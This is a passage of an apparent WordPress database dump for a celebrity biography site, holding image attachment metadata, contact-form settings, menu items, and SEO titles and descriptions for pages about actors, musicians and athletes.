4:{s:4:\"file\";s:33:\"Arnold-Schwarzenegger-547x420.jpg\";s:5:\"width\";i:547;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:21:\"UN Photo/Marco Castro\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:215:\"Arnold Schwarzenegger, Governor of California, addresses the High-Level meeting on Climate Change, at UN Headquarters in New York. \r24/Sep/2007. United Nations, New York. UN Photo/Marco Castro. www.un.org/av/photo/\";s:17:\"created_timestamp\";s:10:\"1190641599\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:55:\"Governor of California Addresses Climate Change Meeting\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(992,184,'_wp_attachment_image_alt','Arnold Schwarzenegger'),(993,152,'_thumbnail_id','184'),(997,186,'_form','<p>Your Name (required)<br />\n [text* your-name] </p>\n\n<p>Your Email (required)<br />\n [email* your-email] </p>\n\n<p>Subject<br />\n [text your-subject] </p>\n\n<p>Your Message<br />\n [textarea your-message] </p>\n\n<p>[recaptcha size:normal] <br /></p>\n\n<p>[submit \"Send\"]</p>'),(998,186,'_mail','a:8:{s:7:\"subject\";s:26:\"BirthdayPedia Contact Form\";s:6:\"sender\";s:26:\"no-reply@birthdaypedia.com\";s:4:\"body\";s:176:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on BirthdayPedia (https://birthdaypedia.com)\";s:9:\"recipient\";s:25:\"contact@birthdaypedia.com\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(999,186,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:14:\"[your-subject]\";s:6:\"sender\";s:43:\"BirthdayPedia <wordpress@birthdaypedia.com>\";s:4:\"body\";s:118:\"Message Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on BirthdayPedia (https://birthdaypedia.com)\";s:9:\"recipient\";s:12:\"[your-email]\";s:18:\"additional_headers\";s:27:\"Reply-To: glowens@gmail.com\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(1000,186,'_messages','a:23:{s:12:\"mail_sent_ok\";s:43:\"Your message was sent successfully. Thanks.\";s:12:\"mail_sent_ng\";s:93:\"Failed to send your message. Please try later or contact the administrator by another method.\";s:16:\"validation_error\";s:74:\"Validation errors occurred. Please confirm the fields and submit it again.\";s:4:\"spam\";s:93:\"Failed to send your message. Please try later or contact the administrator by another method.\";s:12:\"accept_terms\";s:35:\"Please accept the terms to proceed.\";s:16:\"invalid_required\";s:34:\"Please fill in the required field.\";s:16:\"invalid_too_long\";s:23:\"This input is too long.\";s:17:\"invalid_too_short\";s:24:\"This input is too short.\";s:17:\"captcha_not_match\";s:31:\"Your entered code is incorrect.\";s:14:\"invalid_number\";s:28:\"Number format seems invalid.\";s:16:\"number_too_small\";s:25:\"This number is too small.\";s:16:\"number_too_large\";s:25:\"This number is too large.\";s:13:\"invalid_email\";s:28:\"Email address seems invalid.\";s:11:\"invalid_url\";s:18:\"URL seems invalid.\";s:11:\"invalid_tel\";s:31:\"Telephone number seems invalid.\";s:23:\"quiz_answer_not_correct\";s:27:\"Your answer is not correct.\";s:12:\"invalid_date\";s:26:\"Date format seems invalid.\";s:14:\"date_too_early\";s:23:\"This date is too early.\";s:13:\"date_too_late\";s:22:\"This date is too late.\";s:13:\"upload_failed\";s:22:\"Failed to upload file.\";s:24:\"upload_file_type_invalid\";s:30:\"This file type is not allowed.\";s:21:\"upload_file_too_large\";s:23:\"This file is too large.\";s:23:\"upload_failed_php_error\";s:38:\"Failed to upload file. Error occurred.\";}'),(1001,186,'_additional_settings',''),(1002,186,'_locale','en_US'),(1010,188,'_edit_lock','1485546156:7'),(1011,188,'_edit_last','7'),(1012,188,'_wp_page_template','default'),(1013,188,'_wpb_vc_js_status','false'),(1014,188,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1015,188,'slide_template','default'),(1016,188,'td_homepage_loop','a:1:{s:5:\"limit\";s:2:\"10\";}'),(1019,164,'_yoast_wpseo_focuskw','Manu Ginobili'),(1020,164,'_yoast_wpseo_title','Manu Ginobili'),(1021,164,'_yoast_wpseo_linkdex','84'),(1023,22,'_yoast_wpseo_focuskw','Enrique Iglesias'),(1024,22,'_yoast_wpseo_title','Enrique Iglesias'),(1025,22,'_yoast_wpseo_metadesc','Enrique Iglesias'),(1026,22,'_yoast_wpseo_linkdex','82'),(1028,17,'_yoast_wpseo_focuskw','John Constantine Unitas'),(1029,17,'_yoast_wpseo_title','John Constantine Unitas'),(1030,17,'_yoast_wpseo_metadesc','John Constantine Unitas'),(1031,17,'_yoast_wpseo_linkdex','79'),(1033,15,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1034,15,'slide_template',''),(1035,15,'_yoast_wpseo_focuskw','George Clooney'),(1036,15,'_yoast_wpseo_title','George Clooney'),(1037,15,'_yoast_wpseo_metadesc','George Clooney'),(1038,15,'_yoast_wpseo_linkdex','83'),(1040,66,'_yoast_wpseo_focuskw','Hugh Laurie'),(1041,66,'_yoast_wpseo_title','Hugh Laurie'),(1042,66,'_yoast_wpseo_metadesc','Hugh Laurie is a British comedian, actor, musician, director and author who rose to fame in the United States with his role as the cranky, irascible Dr. Gregory House on the television drama House.'),(1043,66,'_yoast_wpseo_linkdex','83'),(1045,12,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1046,12,'slide_template',''),(1047,12,'_yoast_wpseo_focuskw','Pop Singer Chris Brown'),(1048,12,'_yoast_wpseo_title','Pop Singer Chris Brown'),(1049,12,'_yoast_wpseo_metadesc','Pop Singer Chris Brown'),(1050,12,'_yoast_wpseo_linkdex','78'),(1052,10,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1053,10,'slide_template',''),(1054,10,'_yoast_wpseo_focuskw','Country Singer Randy Travis'),(1055,10,'_yoast_wpseo_title','Country Singer Randy Travis'),(1056,10,'_yoast_wpseo_metadesc','Country Singer Randy Travis'),(1057,10,'_yoast_wpseo_linkdex','79'),(1059,56,'_yoast_wpseo_focuskw','Paula Abdul'),(1060,56,'_yoast_wpseo_title','Paula Abdul'),(1061,56,'_yoast_wpseo_metadesc','Paula Abdul'),(1062,56,'_yoast_wpseo_linkdex','83'),(1064,58,'_yoast_wpseo_focuskw','Randy Jackson'),(1065,58,'_yoast_wpseo_title','Randy Jackson'),(1066,58,'_yoast_wpseo_metadesc','Randy Jackson'),(1067,58,'_yoast_wpseo_linkdex','84'),(1069,6,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1070,6,'slide_template',''),(1071,6,'_yoast_wpseo_focuskw','Dwayne \"The Rock\" Johnson'),(1072,6,'_yoast_wpseo_title','Dwayne \"The Rock\" Johnson'),(1073,6,'_yoast_wpseo_metadesc','Dwayne \"The Rock\" Johnson'),(1074,6,'_yoast_wpseo_linkdex','73'),(1077,4,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1078,4,'slide_template',''),(1079,4,'_yoast_wpseo_focuskw','Tim McGraw'),(1080,4,'_yoast_wpseo_title','Country Legend Tim McGraw'),(1081,4,'_yoast_wpseo_metadesc','Country Legend Tim McGraw'),(1082,4,'_yoast_wpseo_linkdex','85'),(1085,40,'_yoast_wpseo_focuskw','Ricky Gervais'),(1086,40,'_yoast_wpseo_title','Ricky Gervais – TV Actor'),(1087,40,'_yoast_wpseo_metadesc','Ricky Gervais – TV Actor'),(1088,40,'_yoast_wpseo_linkdex','84'),(1090,42,'_yoast_wpseo_focuskw','Ariana Grande'),(1091,42,'_yoast_wpseo_title','Ariana Grande – Pop Singer'),(1092,42,'_yoast_wpseo_metadesc','Learn about the life of Ariana Grande right here! How her career started, what she’s known for, and where she currently is right now. Learn more here!'),(1093,42,'_yoast_wpseo_linkdex','87'),(1095,43,'_yoast_wpseo_focuskw','Gary Busey'),(1096,43,'_yoast_wpseo_title','Gary Busey – Actor'),(1097,43,'_yoast_wpseo_metadesc','Gary Busey is a very talented actor, guitar player, and singer! He’s been through a lot in his life. Despite setbacks he has risen to the top.'),(1098,43,'_yoast_wpseo_linkdex','86'),(1101,44,'_yoast_wpseo_focuskw','Mike Tyson'),(1102,44,'_yoast_wpseo_title','Mike Tyson – Boxer'),(1103,44,'_yoast_wpseo_metadesc','Learn about the boxing legend Mike Tyson. His ups, downs, the fights both in and out of the ring. He’s a legend and a man who has dealt with much in life.'),(1104,44,'_yoast_wpseo_linkdex','86'),(1106,118,'_yoast_wpseo_focuskw','Sabrina Carpenter'),(1107,118,'_yoast_wpseo_title','Sabrina Carpenter'),(1108,118,'_yoast_wpseo_metadesc','Sabrina Carpenter'),(1109,118,'_yoast_wpseo_linkdex','79'),(1111,120,'_yoast_wpseo_focuskw','Tony Hawk'),(1112,120,'_yoast_wpseo_title','Tony Hawk'),(1113,120,'_yoast_wpseo_metadesc','Tony Hawk'),(1114,120,'_yoast_wpseo_linkdex','84'),(1116,121,'_yoast_wpseo_focuskw','Robert Pattinson'),(1117,121,'_yoast_wpseo_title','Robert Pattinson'),(1118,121,'_yoast_wpseo_metadesc','Robert Pattinson'),(1119,121,'_yoast_wpseo_linkdex','83'),(1121,45,'_yoast_wpseo_focuskw','Miranda Cosgrove'),(1122,45,'_yoast_wpseo_title','Miranda Cosgrove'),(1123,45,'_yoast_wpseo_metadesc','Miranda Cosgrove is an American actress and pop singer who became popular at a young age for her Nickelodeon television shows iCarly and Drake & Josh.'),(1124,45,'_yoast_wpseo_linkdex','86'),(1126,46,'_yoast_wpseo_focuskw','George Strait'),(1127,46,'_yoast_wpseo_title','George Strait'),(1128,46,'_yoast_wpseo_metadesc','George Strait is known as the “King of Country,” and is popular for his huge number of #1 singles that exemplify his neotraditionalist country style.'),(1129,46,'_yoast_wpseo_linkdex','86'),(1131,47,'_yoast_wpseo_focuskw','Ray Lewis'),(1132,47,'_yoast_wpseo_title','Ray Lewis'),(1133,47,'_yoast_wpseo_metadesc','Ray Lewis was a Linebacker for the NFL team the Baltimore Ravens who is popular both for his outstanding record in the game as well as his involvement in a 2000 murder trial.'),(1134,47,'_yoast_wpseo_linkdex','84'),(1136,48,'_yoast_wpseo_focuskw','Casey Kasem'),(1137,48,'_yoast_wpseo_title','Casey Kasem - Renowned Radio Host'),(1138,48,'_yoast_wpseo_metadesc','Curious about radio host legend Casey Kasem? He’s DJ’d from Michigan to Korea, earned awards, and made an impression on our culture, learn all about his life.'),(1139,48,'_yoast_wpseo_linkdex','79'),(1141,50,'_yoast_wpseo_focuskw','Jay Leno'),(1142,50,'_yoast_wpseo_title','Jay Leno: Acclaimed TV Host'),(1143,50,'_yoast_wpseo_metadesc','Known for his late night show, Jay Leno is a renewed comedian, but did you know he’s also a car enthusiast and generous towards charities? Learn about him here.'),(1144,50,'_yoast_wpseo_linkdex','86'),(1146,49,'_yoast_wpseo_focuskw','Jerry Seinfeld'),(1147,49,'_yoast_wpseo_title','Jerry Seinfeld - 12th Greatest Stand-up Comedian According to Comedy Central'),(1148,49,'_yoast_wpseo_metadesc','Jerry Seinfeld, referred to as one of the best comedians of our time, is most affiliated with the hit sitcom Seinfeld. Read here to know more about his life.'),(1149,49,'_yoast_wpseo_linkdex','80'),(1151,51,'_yoast_wpseo_focuskw','Dianna Argon'),(1152,51,'_yoast_wpseo_title','Dianna Argon, Actress'),(1153,51,'_yoast_wpseo_metadesc','Dianna Argon- the young actress, singer, and director is taking the entertainment business by storm. There’s more to this starlet’s life than Glee, find out.'),(1154,51,'_yoast_wpseo_linkdex','78'),(1156,52,'_yoast_wpseo_focuskw','Jack Nicholson'),(1157,52,'_yoast_wpseo_title','Jack Nicholson'),(1158,52,'_yoast_wpseo_metadesc','This article discusses Jack Nicholson’s life and his current status today as a famous actor and screenwriter.'),(1159,52,'_yoast_wpseo_linkdex','87'),(1161,53,'_yoast_wpseo_focuskw','John Cena'),(1162,53,'_yoast_wpseo_title','John Cena'),(1163,53,'_yoast_wpseo_metadesc','This article discusses John Cena and his career from WWE superstar to current acting career and personal life.'),(1164,53,'_yoast_wpseo_linkdex','87'),(1166,54,'_yoast_wpseo_focuskw','Kelly Clarkson'),(1167,54,'_yoast_wpseo_title','Kelly Clarkson'),(1168,54,'_yoast_wpseo_metadesc','This article discusses Kelly Clarkson, from her early career to her current career today as a musical artist and perfomer.'),(1169,54,'_yoast_wpseo_linkdex','90'),(1171,55,'_yoast_wpseo_focuskw','Paul McCartney'),(1172,55,'_yoast_wpseo_title','Paul McCartney'),(1173,55,'_yoast_wpseo_metadesc','Paul McCartney'),(1174,55,'_yoast_wpseo_linkdex','84'),(1176,57,'_yoast_wpseo_focuskw','Meryl Streep'),(1177,57,'_yoast_wpseo_title','Meryl Streep'),(1178,57,'_yoast_wpseo_metadesc','Meryl Streep'),(1179,57,'_yoast_wpseo_linkdex','84'),(1181,59,'_yoast_wpseo_focuskw','Lionel Messi'),(1182,59,'_yoast_wpseo_title','Lionel Messi'),(1183,59,'_yoast_wpseo_metadesc','Lionel Messi'),(1184,59,'_yoast_wpseo_linkdex','84'),(1186,60,'_yoast_wpseo_focuskw','Kanye West'),(1187,60,'_yoast_wpseo_title','Kanye West'),(1188,60,'_yoast_wpseo_metadesc','Kanye West is a well-known artist today. With over 20 Grammy awards, his own record label and designing credits, West has been a very present personality over the last 15 years in American culture.'),(1189,60,'_yoast_wpseo_linkdex','87'),(1191,61,'_yoast_wpseo_focuskw','Andrea Pirlo'),(1192,61,'_yoast_wpseo_title','Andrea Pirlo'),(1193,61,'_yoast_wpseo_metadesc','Andrea Pirlo is a professional soccer player (footballer) who plays for both the Italian national team and for the Turin based Juventus Football Club S.p.A.'),(1194,61,'_yoast_wpseo_linkdex','85'),(1196,62,'_yoast_wpseo_focuskw','Johnny Depp'),(1197,62,'_yoast_wpseo_title','Johnny Depp'),(1198,62,'_yoast_wpseo_metadesc','Johnny Depp is an award winning American actor and musician known for unique roles. Depp chooses roles that are often off-beat and dark characters that draw one into his world of insight and intrigue.'),(1199,62,'_yoast_wpseo_linkdex','88'),(1201,63,'_yoast_wpseo_focuskw','Cher'),(1202,63,'_yoast_wpseo_title','Cher'),(1203,63,'_yoast_wpseo_metadesc','Cher is an American singer, Goddess of Pop, Oscar winning actress, entertainer, outrageous fashion icon, and personality. She has a career that spans decades.'),(1204,63,'_yoast_wpseo_linkdex','89'),(1206,65,'_yoast_wpseo_focuskw','Mr. T'),(1207,65,'_yoast_wpseo_title','Mr. T'),(1208,65,'_yoast_wpseo_metadesc','Mr. T is an American actor, professional wrestler, motivational speaker, and all around tough-guy with an easily recognizable and very memorable brand.'),(1209,65,'_yoast_wpseo_linkdex','88'),(1212,67,'_yoast_wpseo_focuskw','Santana Garrett'),(1213,67,'_yoast_wpseo_title','Santana Garrett'),(1214,67,'_yoast_wpseo_metadesc','Santana Garrett is a successful female professional wrestler under the ring names Brittany, Santana, & Santana G. She is also an American model and a valet.'),(1215,67,'_yoast_wpseo_linkdex','85'),(1217,69,'_yoast_wpseo_focuskw','Jim Nabors'),(1218,69,'_yoast_wpseo_title','Jim Nabors'),(1219,69,'_yoast_wpseo_metadesc','Jim Nabors is a legend when it comes to television. Learn a bit more about his personal life, his career, and what he’s done to change history!'),(1220,69,'_yoast_wpseo_linkdex','90'),(1222,70,'_yoast_wpseo_focuskw','Courteney Cox'),(1223,70,'_yoast_wpseo_title','Courteney Cox'),(1224,70,'_yoast_wpseo_metadesc','Courteney Cox (51) has been in the business since 1984, and since then has appeared in dozens of shows and films. See where she’s at now!'),(1225,70,'_yoast_wpseo_linkdex','86'),(1227,71,'_yoast_wpseo_focuskw','Tupac Shakur'),(1228,71,'_yoast_wpseo_title','Tupac Shakur'),(1229,71,'_yoast_wpseo_metadesc','The famous Tupac Shakur was more than just a rapper, and rapped about more than just his struggles with the piles of money he was earning. Learn more about Lesane Parish Crooks, AKA Tupac!'),(1230,71,'_yoast_wpseo_linkdex','84'),(1232,73,'_yoast_wpseo_focuskw','Barry Manilow'),(1233,73,'_yoast_wpseo_title','Barry Manilow'),(1234,73,'_yoast_wpseo_metadesc','Barry Manilow is 72, did you know that? Guess what else you didn’t know about this famous singer and pianist? Read on to find out!'),(1235,73,'_yoast_wpseo_linkdex','85'),(1237,74,'_yoast_wpseo_focuskw','Ian McKellen'),(1238,74,'_yoast_wpseo_title','Ian McKellen'),(1239,74,'_yoast_wpseo_metadesc','Sir Ian Murray McKellen is not just an icon in the film industry but is an all roundedly talented and intelligent individual who\'s worth looking up to and emulating.'),(1240,74,'_yoast_wpseo_linkdex','78'),(1242,75,'_yoast_wpseo_focuskw','Jamie Oliver'),(1243,75,'_yoast_wpseo_title','Jamie Oliver'),(1244,75,'_yoast_wpseo_metadesc','Jamie Oliver\'s achievements showcase just how easy it is to make one\'s dreams come true. But, for this to happen, one ought to be very passionate about what they do and, be very hardworking.'),(1245,75,'_yoast_wpseo_linkdex','83'),(1247,76,'_yoast_wpseo_focuskw','Jep Robertson'),(1248,76,'_yoast_wpseo_title','Jep Robertson'),(1249,76,'_yoast_wpseo_metadesc','Though he rarely makes an appearance on Duck Dynasty reality TV series, Jep Robertson\'s contribution (behind the screen/camera) has played a key role in popularizing the Robertson family.'),(1250,76,'_yoast_wpseo_linkdex','83'),(1252,77,'_yoast_wpseo_focuskw','La Toya Jackson'),(1253,77,'_yoast_wpseo_title','La Toya Jackson'),(1254,77,'_yoast_wpseo_metadesc','Despite being 59 years young, La Toya Jackson is still looking great and doing amazing things with her life. To date, she continues to remain active both in the music and the film industries.'),(1255,77,'_yoast_wpseo_linkdex','83'),(1257,78,'_yoast_wpseo_focuskw','Lenny Kravitz'),(1258,78,'_yoast_wpseo_title','Lenny Kravitz'),(1259,78,'_yoast_wpseo_metadesc','51 year old Lenny Kravitz has proved himself as being one of the most ambitious and multi-faceted artist of all time. What\'s more is that he keeps on getting better.'),(1260,78,'_yoast_wpseo_linkdex','83'),(1262,115,'_yoast_wpseo_focuskw','Anderson Cooper'),(1263,115,'_yoast_wpseo_title','Anderson Cooper'),(1264,115,'_yoast_wpseo_metadesc','Anderson Cooper is a well-known TV personality, having been featured in CNN and ABC news. Read about his life, career, and personal accomplishments.'),(1265,115,'_yoast_wpseo_linkdex','85'),(1267,117,'_yoast_wpseo_focuskw','Angelina Jolie'),(1268,117,'_yoast_wpseo_title','Angelina Jolie'),(1269,117,'_yoast_wpseo_metadesc','Angelina Jolie is a renowned actor, having been featured in a number of popular movies. Read about her life, her career achievements, and what she is up to.'),(1270,117,'_yoast_wpseo_linkdex','90'),(1272,79,'_yoast_wpseo_focuskw','Morgan Freeman'),(1273,79,'_yoast_wpseo_title','Morgan Freeman'),(1274,79,'_yoast_wpseo_metadesc','Morgan Freeman rose from a humble background to become one of the most renowned Hollywood actors. Here’s his biography.'),(1275,79,'_yoast_wpseo_linkdex','83'),(1277,80,'_yoast_wpseo_focuskw','Robert Englund'),(1278,80,'_yoast_wpseo_title','Robert Englund'),(1279,80,'_yoast_wpseo_metadesc','Robert Englund is a renowned actor and director in the horror movie industry. Find out how he started out, his career accomplishments, and current personal life.'),(1280,80,'_yoast_wpseo_linkdex','87'),(1282,81,'_yoast_wpseo_focuskw','Zachary Quinto'),(1283,81,'_yoast_wpseo_title','Zachary Quinto'),(1284,81,'_yoast_wpseo_metadesc','Zachary Quinto is a renowned actor who have won various awards for his role in the entertainment industry. Here’s his biography.'),(1285,81,'_yoast_wpseo_linkdex','86'),(1287,64,'_yoast_wpseo_focuskw','Kate Upton'),(1288,64,'_yoast_wpseo_title','Kate Upton'),(1289,64,'_yoast_wpseo_metadesc','Kate Upton'),(1290,64,'_yoast_wpseo_linkdex','84'),(1291,194,'_edit_lock','1485546144:7'),(1292,194,'_edit_last','7'),(1293,194,'_wp_page_template','default'),(1294,194,'_wpb_vc_js_status','false'),(1295,194,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1296,194,'slide_template','default'),(1297,194,'td_homepage_loop','a:1:{s:5:\"limit\";s:2:\"10\";}'),(1298,195,'_menu_item_type','post_type'),(1299,195,'_menu_item_menu_item_parent','0'),(1300,195,'_menu_item_object_id','194'),(1301,195,'_menu_item_object','page'),(1302,195,'_menu_item_target',''),(1303,195,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1304,195,'_menu_item_xfn',''),(1305,195,'_menu_item_url',''),(1307,196,'_menu_item_type','post_type'),(1308,196,'_menu_item_menu_item_parent','0'),(1309,196,'_menu_item_object_id','188'),(1310,196,'_menu_item_object','page'),(1311,196,'_menu_item_target',''),(1312,196,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1313,196,'_menu_item_xfn',''),(1314,196,'_menu_item_url',''),(1325,195,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1326,195,'td_mega_menu_cat',''),(1327,195,'td_mega_menu_page_id',''),(1328,196,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1329,196,'td_mega_menu_cat',''),(1330,196,'td_mega_menu_page_id',''),(1335,199,'_edit_lock','1444415072:6'),(1336,199,'_edit_last','6'),(1337,199,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1338,199,'slide_template',''),(1339,199,'_yoast_wpseo_focuskw','Barack Obama'),(1340,199,'_yoast_wpseo_title','Barack Obama'),(1341,199,'_yoast_wpseo_metadesc','Barrack Obama, the current President of the United States, is one of the most influential and powerful people in the world. Read more about his early life, career accomplishments and current personal life.'),(1342,199,'_yoast_wpseo_linkdex','78'),(1343,199,'post_views_count','291'),(1344,200,'_edit_lock','1444831902:6'),(1345,200,'_edit_last','6'),(1346,200,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1347,200,'slide_template',''),(1348,200,'_yoast_wpseo_focuskw','Charlize Theron'),(1349,200,'_yoast_wpseo_title','Charlize Theron'),(1350,200,'_yoast_wpseo_metadesc','Charlize Theron is a South-African born actress famous fore her role in the film industry. Read more about her early life, career accomplishments, and current personal life.'),(1351,200,'_yoast_wpseo_linkdex','84'),(1352,200,'post_views_count','350'),(1353,201,'_edit_lock','1444415883:6'),(1354,201,'_edit_last','6'),(1355,201,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1356,201,'slide_template',''),(1357,201,'_yoast_wpseo_focuskw','Evangeline Lilly'),(1358,201,'_yoast_wpseo_title','Evangeline Lilly'),(1359,201,'_yoast_wpseo_metadesc','Evangeline Lilly is a Canadian actress best known for her role in big films and charity works. Read more about her early life, career accomplishments, and current personal life.'),(1360,201,'_yoast_wpseo_linkdex','79'),(1361,201,'post_views_count','246'),(1362,202,'_edit_lock','1444414986:6'),(1363,202,'_edit_last','6'),(1364,202,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1365,202,'slide_template',''),(1366,202,'_yoast_wpseo_focuskw','Jessica Nigri'),(1367,202,'_yoast_wpseo_title','Jessica Nigri'),(1368,202,'_yoast_wpseo_metadesc','Jessica Nigri is a famous promotional model and American Cosplay working with big gaming companies. Read more about her early life, how she started her modeling career, and her accomplishments.'),(1369,202,'_yoast_wpseo_linkdex','83'),(1370,202,'post_views_count','704'),(1371,203,'_edit_lock','1444831825:6'),(1372,203,'_edit_last','6'),(1373,203,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1374,203,'slide_template',''),(1375,203,'_yoast_wpseo_metadesc','Marisa Miller is an American model and actress best known for her wok for Victoria’s Secret. Read more about her early life, career accomplishments and current personal life.'),(1376,203,'_yoast_wpseo_focuskw','Marisa Miller '),(1377,203,'_yoast_wpseo_title','Marisa Miller '),(1378,203,'_yoast_wpseo_linkdex','69'),(1379,203,'post_views_count','251'),(1385,206,'_wp_attached_file','2015/08/Nicole-Evangeline-Lilly.jpg'),(1386,206,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:534;s:4:\"file\";s:35:\"2015/08/Nicole-Evangeline-Lilly.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"Nicole-Evangeline-Lilly-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"Nicole-Evangeline-Lilly-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"Nicole-Evangeline-Lilly-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:33:\"Nicole-Evangeline-Lilly-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:34:\"Nicole-Evangeline-Lilly-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:35:\"Nicole-Evangeline-Lilly-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:35:\"Nicole-Evangeline-Lilly-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:35:\"Nicole-Evangeline-Lilly-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:35:\"Nicole-Evangeline-Lilly-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:35:\"Nicole-Evangeline-Lilly-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:35:\"Nicole-Evangeline-Lilly-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:35:\"Nicole-Evangeline-Lilly-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:35:\"Nicole-Evangeline-Lilly-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:35:\"Nicole-Evangeline-Lilly-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:35:\"Nicole-Evangeline-Lilly-696x465.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:465;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:35:\"Nicole-Evangeline-Lilly-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:35:\"Nicole-Evangeline-Lilly-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:35:\"Nicole-Evangeline-Lilly-629x420.jpg\";s:5:\"width\";i:629;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1387,206,'_wp_attachment_image_alt',''),(1391,201,'_thumbnail_id','206'),(1393,207,'_wp_attached_file','2015/08/Barack-Obama.jpg'),(1394,207,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:427;s:4:\"file\";s:24:\"2015/08/Barack-Obama.jpg\";s:5:\"sizes\";a:15:{s